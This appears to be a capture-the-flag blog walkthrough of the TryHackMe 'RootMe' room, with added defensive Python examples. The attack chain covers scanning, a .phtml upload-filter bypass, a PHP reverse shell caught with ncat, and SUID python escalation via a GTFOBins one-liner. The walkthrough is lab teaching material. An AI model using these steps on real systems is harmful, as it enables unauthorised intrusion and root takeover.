In this blog, you will learn how to hack the RootMe machine from TryHackMe.
So let's jump straight to TryHackMe and deploy the machine. Here is the link for the room: https://www.tryhackme.com/room/rrootme
TASK-1: Deploy the Machine
Start the machine.
1. Deploy the machine
– No answer needed.
TASK-2: Reconnaissance
Reconnaissance refers to the practice of covertly gathering data online. This intelligence gathering can be done with both pure and impure intentions; we are doing it with pure intentions on this test machine named RootMe. So let's perform a quick Nmap scan and find information about the target.
- In case you don't know, Nmap is a network mapper that has emerged as one of the most popular free network discovery tools on the market. Nmap is now one of the core tools used by network administrators to map their networks.
To scan a network you can use the following command:
nmap -A -T4 <MACHINE_IP>
- -A: Enable OS detection, version detection, script scanning, and traceroute.
- -T4: Set timing template (higher is faster).
Nmap scan result:
- 22/tcp open ssh OpenSSH 7.6p1
- 80/tcp open http Apache httpd 2.4.29
- Service Info: OS: Linux
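As an added example (not from the original post), here is a small Python parser for the port lines of Nmap's normal output. It runs over a constructed sample matching the scan result above (the banner details are illustrative) and returns the open-port count, the service on a given port and the Apache version that the questions ask for; the same code can be pointed at a saved nmap -oN file of your own hosts to diff open ports against what you expect.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of Nmap normal-output port lines, matching the RootMe
# result above (banner details are illustrative, not copied from a real scan).
SAMPLE_NMAP_OUTPUT = """\
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.6p1 (Ubuntu Linux; protocol 2.0)
80/tcp  open   http    Apache httpd 2.4.29 ((Ubuntu))
443/tcp closed https
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One port line: "<port>/<proto> <state> <service> [<version banner>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap_ports(text: str) -> List[PortRecord]:
    """Extract one record per 'PORT/PROTO STATE SERVICE VERSION' line; other lines are ignored."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            records.append(PortRecord(int(port), proto, state, service, version or ""))
    return records


def open_ports(records: List[PortRecord]) -> List[PortRecord]:
    return [r for r in records if r.state == "open"]


def service_on(records: List[PortRecord], port: int) -> Optional[str]:
    """Service name Nmap reported on an open port, or None if the port is not open."""
    for r in records:
        if r.port == port and r.state == "open":
            return r.service
    return None


def apache_version(records: List[PortRecord]) -> Optional[str]:
    """Pull the version number out of an 'Apache httpd X.Y.Z' banner, if present."""
    for r in records:
        m = re.search(r"Apache httpd (\S+)", r.version)
        if m:
            return m.group(1)
    return None


if __name__ == "__main__":
    recs = parse_nmap_ports(SAMPLE_NMAP_OUTPUT)
    print(f"{len(open_ports(recs))} open ports; port 22 runs {service_on(recs, 22)}; "
          f"Apache {apache_version(recs)}")
```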
1. Scan the rootme machine, how many ports are open?
– 2
2. What version of Apache is running?
– 2.4.29
3. What service is running on port 22?
– ssh
4. Find directories on the web server using the GoBuster tool.
What is Gobuster?
- Gobuster is a tool used to brute-force URIs (directories and files) on websites and DNS subdomains (with wildcard support). To learn more about Gobuster and the installation process visit: https://github.com/OJ/gobuster
To brute-force directories you can use the following command:
gobuster dir -u <URL> -w <WORDLIST_LOCATION>
- -u: URL of the rootme machine.
- -w: Path to wordlist.
– No answer needed.
5. What is the hidden directory?
– /panel/
TASK-3: Getting a Shell
Navigate to the URL: http://<MACHINE_IP>
It's a basic web page and nothing interesting.
Let's check the source code of the website; sometimes you'll end up finding sensitive endpoints, passwords, hidden paths, and secret keys inside the source code.
Here we got nothing in the source code, so let's see what's in the hidden directory /panel/ we previously discovered using Gobuster.
Navigating to the URL: http://<MACHINE_IP>/panel
Here we found a file upload form.
Ah!!!! What if we can upload malicious .php files? Let's check.
Tried .php – Denied.
Tried .phtml – Success !!!!
Wanna know how I did this? It's called a file upload restriction bypass.
To learn in depth about this, visit: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
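To show what the .php/.phtml result above means for the people running the upload form, here is an added Python model (my own code, not from the room or from the original post) of the two kinds of check: a denylist that only names .php, which is what the behaviour above looks like from the outside, next to an allowlist check with magic-byte validation and a server-chosen file name. The set of script extensions and the image signatures are my assumptions; Debian and Ubuntu's stock Apache PHP configuration maps .php, .phtml and .phar to the PHP handler, which is why a denylist of .php alone is not enough.

```python
import secrets
from typing import Optional, Tuple

# Constructed model of the check the walkthrough ran into on /panel: a denylist
# that only names ".php", so ".phtml" slips through.
NAIVE_DENYLIST = {".php"}

# Assumed list of extensions Apache's PHP module may hand to the interpreter.
# Debian/Ubuntu ship a FilesMatch rule for .php, .phtml and .phar; the others
# turn up in older or hand-written handler configs.
PHP_HANDLER_EXTENSIONS = {".php", ".phtml", ".phar", ".php3", ".php4",
                          ".php5", ".php7", ".phps"}

# What the upload form is actually for: images, identified by their magic bytes.
ALLOWED_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def naive_upload_allowed(filename: str) -> bool:
    """The weak check: deny a few known-bad extensions, accept everything else."""
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in NAIVE_DENYLIST


def hardened_upload_allowed(filename: str, head: bytes) -> Tuple[bool, Optional[str]]:
    """Allowlist + content check + server-chosen name.

    Returns (accepted, stored_name). The stored name never comes from the client,
    so a name like 'x.phtml.png' cannot reach the web root as-is.
    """
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return False, None
    ext = "." + parts[-1]
    # Reject if any dotted component is a script extension: with AddHandler-style
    # config Apache may execute 'x.phtml.png' as PHP.
    if any("." + p in PHP_HANDLER_EXTENSIONS for p in parts[1:]):
        return False, None
    if ext not in ALLOWED_TYPES:
        return False, None
    # The first bytes must match one of the signatures for the claimed type.
    if not any(head.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, None
    return True, secrets.token_hex(16) + ext


if __name__ == "__main__":
    png_head = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
    print("naive .php :", naive_upload_allowed("shell.php"))
    print("naive .phtml:", naive_upload_allowed("shell.phtml"))
    print("hardened .phtml:", hardened_upload_allowed("shell.phtml", b"<?php echo 1; ?>"))
    print("hardened .png  :", hardened_upload_allowed("cat.png", png_head))
```

Pair the allowlist with an upload directory that Apache never hands to a script handler (or that sits outside the web root), so that even a mistake in the validation does not produce an executable file.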
Now we can upload a PHP reverse shell here; we'll use the pentestmonkey php-reverse-shell.php script to obtain a reverse shell with netcat.
- In case you don't know, Netcat (also known as 'nc') is a networking utility for reading from and writing to TCP and UDP sockets using a simple interface. To learn more about netcat visit: https://nmap.org/ncat/
- Here is the link for the PHP reverse shell: https://github.com/pentestmonkey/php-reverse-shell
Download the script, and remember to replace $ip in the script with your machine's IP and $port with any port; I'll be using 1337.
- Save the changes and upload the script at http://<MACHINE_IP>/panel
- Start the netcat listener on the port you chose. I'm using port 1337.
A netcat listener can be started using the following command:
ncat -nlvp <PORT_NUMBER>
- -n: Do not resolve hostnames via DNS
- -l: Bind and listen for incoming connections
- -v: Set verbosity level (can be used several times)
- -p: Specify source port to use
Now we'll gain a reverse shell by executing the uploaded script; visit the following URL:
http://<MACHINE_IP>/uploads/php-reverse-shell.phtml
Voilà!!!!!
We have successfully gained a shell.
But the shell is not stable; let's make this shell stable using the following command:
python3 -c "import pty;pty.spawn('/bin/bash')"
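From the blue-team side, the shell obtained above looks like an apache2 worker running as www-data with a shell underneath it, and after the pty trick a python3 and a bash underneath that. Here is an added detection example in Python, not from the original post, that walks a constructed ps -eo user,pid,ppid,comm snapshot and flags shells or interpreters whose ancestry leads back to a web server process; the process names in the snapshot and the suspect lists are my assumptions.

```python
from dataclasses import dataclass
from typing import Dict, List

# Constructed snapshot in the shape of `ps -eo user,pid,ppid,comm`, showing what
# the reverse shell and the python3 pty stabiliser look like under Apache,
# plus an ordinary user session that must not be flagged.
SAMPLE_PS = """\
USER       PID  PPID COMMAND
root         1     0 systemd
root       812     1 apache2
www-data   901   812 apache2
www-data   902   812 apache2
www-data  1337   902 sh
www-data  1340  1337 python3
www-data  1341  1340 bash
user      2001     1 bash
user      2002  2001 python3
"""

# Assumed lists: web server process names, and binaries we never expect them to spawn.
WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm"}
SUSPECT_CHILDREN = {"sh", "bash", "dash", "zsh", "python", "python2", "python3",
                    "perl", "nc", "ncat"}


@dataclass
class Proc:
    user: str
    pid: int
    ppid: int
    comm: str


def parse_ps(text: str) -> Dict[int, Proc]:
    """Parse the ps snapshot into a pid -> Proc map (header line skipped)."""
    procs = {}
    for line in text.splitlines()[1:]:
        if not line.strip():
            continue
        user, pid, ppid, comm = line.split(None, 3)
        procs[int(pid)] = Proc(user, int(pid), int(ppid), comm.strip())
    return procs


def ancestry(procs: Dict[int, Proc], pid: int) -> List[Proc]:
    """The process and its parents, following ppid links until the chain leaves the table."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid].ppid
    return chain


def find_web_spawned_shells(text: str) -> List[str]:
    """Return 'comm(pid) <- parent(pid) <- ...' chains for suspect processes under a web server."""
    procs = parse_ps(text)
    alerts = []
    for p in sorted(procs.values(), key=lambda x: x.pid):
        if p.comm not in SUSPECT_CHILDREN:
            continue
        chain = ancestry(procs, p.pid)
        # chain[0] is the process itself; look for a web server among its ancestors.
        if any(a.comm in WEB_SERVERS for a in chain[1:]):
            alerts.append(" <- ".join(f"{a.comm}({a.pid})" for a in chain))
    return alerts


if __name__ == "__main__":
    for alert in find_web_spawned_shells(SAMPLE_PS):
        print("ALERT:", alert)
```

On a live host the same function can be fed the output of ps -eo user,pid,ppid,comm, and the parent-chain logic maps directly onto an EDR process-tree query or auditd execve records keyed on parent PID.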
And find the user.txt file using the following command:
find / -type f -name user.txt 2>/dev/null
- -type f: searches files only.
- -name: name of the file to locate.
- 2>/dev/null: suppresses errors.
We have found the user.txt file and it's inside /var/www/
To read the data inside the file you can use the following command:
cat /var/www/user.txt
1. user.txt
– THM{XXXXXXXXXXXXXXXX}
TASK-4: Privilege Escalation
To escalate privileges we need to hunt for files with the SUID permission.
- SUID is a special file permission for executable files which lets other users run the file with the effective permissions of the file owner.
This can be achieved using the following command:
find / -type f -user root -perm -4000 2>/dev/null
- -type f: searches files only.
- -user root: searches files owned by root.
- -perm -4000: searches files with the given permission bits set (here the SUID bit).
- 2>/dev/null: suppresses errors.
Ah!!!!!!! Here /usr/bin/python has SUID permission – Interesting.
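Here is an added audit example, my own code rather than anything from the original post, that does the job of the find command above from the defender's chair: it checks SUID binaries against an expected baseline of root-owned ones, so that an interpreter such as /usr/bin/python stands out, and separately reports SUID files owned by anyone other than root. The baseline set is an illustrative assumption, not a complete list for any distribution, and the sample entries are constructed.

```python
import os
import stat
from typing import Dict, Iterable, Iterator, List, Tuple

# Assumed baseline: SUID-root binaries a stock Ubuntu host is expected to carry.
# Illustrative only; build the real one from a known-good image of your own.
EXPECTED_SUID_ROOT = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/bin/mount", "/bin/umount",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/bin/ping",
}

# Constructed (path, st_mode, st_uid) entries as os.lstat() would report them.
# 0o104755 = regular file, SUID bit, rwxr-xr-x; 0o100755 = same without SUID.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755, 0),
    ("/usr/bin/sudo", 0o104755, 0),
    ("/bin/ls", 0o100755, 0),
    ("/usr/bin/python", 0o104755, 0),
    ("/home/user/tool", 0o104755, 1000),
]


def is_suid_regular(mode: int) -> bool:
    """True for a regular file with the SUID bit set (what `find -type f -perm -4000` matches)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def audit_suid(entries: Iterable[Tuple[str, int, int]]) -> Dict[str, List[str]]:
    """Sort SUID files into root-owned ones missing from the baseline and non-root-owned ones."""
    report: Dict[str, List[str]] = {"unexpected_root": [], "non_root_owner": []}
    for path, mode, uid in entries:
        if not is_suid_regular(mode):
            continue
        if uid != 0:
            report["non_root_owner"].append(path)
        elif path not in EXPECTED_SUID_ROOT:
            report["unexpected_root"].append(path)
    for paths in report.values():
        paths.sort()
    return report


def scan_filesystem(root: str = "/") -> Iterator[Tuple[str, int, int]]:
    """Walk the real filesystem and yield entries in the same shape as SAMPLE_ENTRIES."""
    for dirpath, dirnames, filenames in os.walk(root):
        # Skip pseudo filesystems; nothing persistent lives there.
        if dirpath.startswith(("/proc", "/sys", "/dev")):
            dirnames[:] = []
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            yield path, st.st_mode, st.st_uid


if __name__ == "__main__":
    print(audit_suid(SAMPLE_ENTRIES))
    # For a real host: print(audit_suid(scan_filesystem("/")))
```

Anything in unexpected_root deserves a look, and an interpreter or editor in that list is the same signal GTFOBins is built around, seen from the other side.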
1. Search for files with SUID permission, which file is weird?
– /usr/bin/python
2. Find a form to escalate your privileges.
– No answer needed.
Let's escalate our privileges.
- GTFOBins has cool privilege escalation commands; they can be found by searching for python SUID on GTFOBins.
We got commands for privilege escalation; here we can skip the first command as the python binary already has SUID permission. Copy and paste the command into the terminal without ./ to see if it works.
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
Voilà!!!!!! It works.
We have successfully escalated our privileges.
As we are root now, let's hunt for the root flag.
It's in the /root directory.
cat /root/root.txt
1. root.txt
– THM{XXXXXXXXXXXXXXXX}
DONE. ROOM COMPLETED!!!!!
Salud!!!!!
The RootMe CTF is aimed at beginners and I would recommend that all beginners try to root it.